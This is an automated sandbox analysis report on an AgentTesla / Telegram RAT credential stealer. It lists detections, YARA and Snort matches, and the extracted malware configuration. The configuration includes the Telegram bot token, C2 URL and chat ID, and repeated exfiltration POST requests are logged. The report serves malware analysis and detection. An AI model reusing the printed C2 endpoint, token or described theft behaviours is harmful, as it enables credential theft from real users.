Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe

Overview

General Information

Sample name:1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
Analysis ID:1443568
MD5:1022eee3d28a81920664b590983aafaa
SHA1:002c1889f8e8ebbf781e3a1edb0985068b2a5b96
SHA256:ccd022fa7f9a0ee0928a7736faed2f9d9123234d209c7fdf9b436776669c4644
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected Telegram RAT
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendMessage?chat_id=1165128482"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
        • 0x355a2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
        • 0x35614:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
        • 0x3569e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
        • 0x35730:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        • 0x3579a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
        • 0x3580c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
        • 0x358a2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
        • 0x35932:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

        PCAP (Network Traffic)

        SourceRuleDescriptionAuthorStrings
        sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 4 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                        0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                          0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                          • 0x355a2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                          • 0x35614:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                          • 0x3569e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                          • 0x35730:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                          • 0x3579a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                          • 0x3580c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                          • 0x358a2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                          • 0x35932:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                          Sigma Signatures

                          No Sigma rule has matched

                          Snort Signatures

                          Timestamp:05/18/24-01:35:57.911306
                          SID:2851779
                          Source Port:49730
                          Destination Port:443
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeAvira: detected
                          Found malware configuration
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendMessage?chat_id=1165128482"}
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.6768.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendMessage"}
                          Machine Learning detection for sample
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeJoe Sandbox ML: detected
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49746 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49750 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49754 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Networking

                          barindex
                          Snort IDS alert for network traffic
                          Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49730 -> 149.154.167.220:443
                          Uses the Telegram API (likely for C&C communication)
                          Source: unknownDNS query: name: api.telegram.org
                          Source: unknownDNS query: name: api.telegram.org
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc76a891c5b1d3Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc76a893006882Host: api.telegram.orgContent-Length: 3951Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc8907cde902bbHost: api.telegram.orgContent-Length: 66993Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc9221f98904f2Host: api.telegram.orgContent-Length: 66995Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc97bb00ca1497Host: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc9b180ffd53ffHost: api.telegram.orgContent-Length: 66995Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc9f5b252489fbHost: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dca59a756be172Host: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcaa4c722ca350Host: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcad575d0aaf1fHost: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcb1fe0d5217c4Host: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcb801a5c9ddf4Host: api.telegram.orgContent-Length: 67000Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcbf5819b9d90cHost: api.telegram.orgContent-Length: 67000Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc29e30c1ac2fHost: api.telegram.orgContent-Length: 71967Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc6683c0d1efdHost: api.telegram.orgContent-Length: 67000Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc834c9eb4802Host: api.telegram.orgContent-Length: 67000Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dccd9f9e07d58aHost: api.telegram.orgContent-Length: 67000Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc76a92388cec9Host: api.telegram.orgContent-Length: 67000Expect: 100-continueConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: unknownHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc76a891c5b1d3Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003574000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003633000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeString found in binary or memory: https://account.dyn.com/
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003574000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003633000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeString found in binary or memory: https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003574000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003633000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49746 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49750 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49754 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Contains functionality to log keystrokes (.Net Source)
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, cPKWk.cs.Net Code: h5ESqJ
                          Installs a global keyboard hook
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, type: SAMPLEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: 0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_032141A00_2_032141A0
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_0321A1DB0_2_0321A1DB
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_0321D4800_2_0321D480
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_03214A700_2_03214A70
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_03213E580_2_03213E58
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_067336780_2_06733678
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_06735E380_2_06735E38
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_067346B00_2_067346B0
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_067397000_2_06739700
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_0673C4500_2_0673C450
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_0673A2400_2_0673A240
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_067392E30_2_067392E3
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_067300400_2_06730040
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_0673E0D80_2_0673E0D8
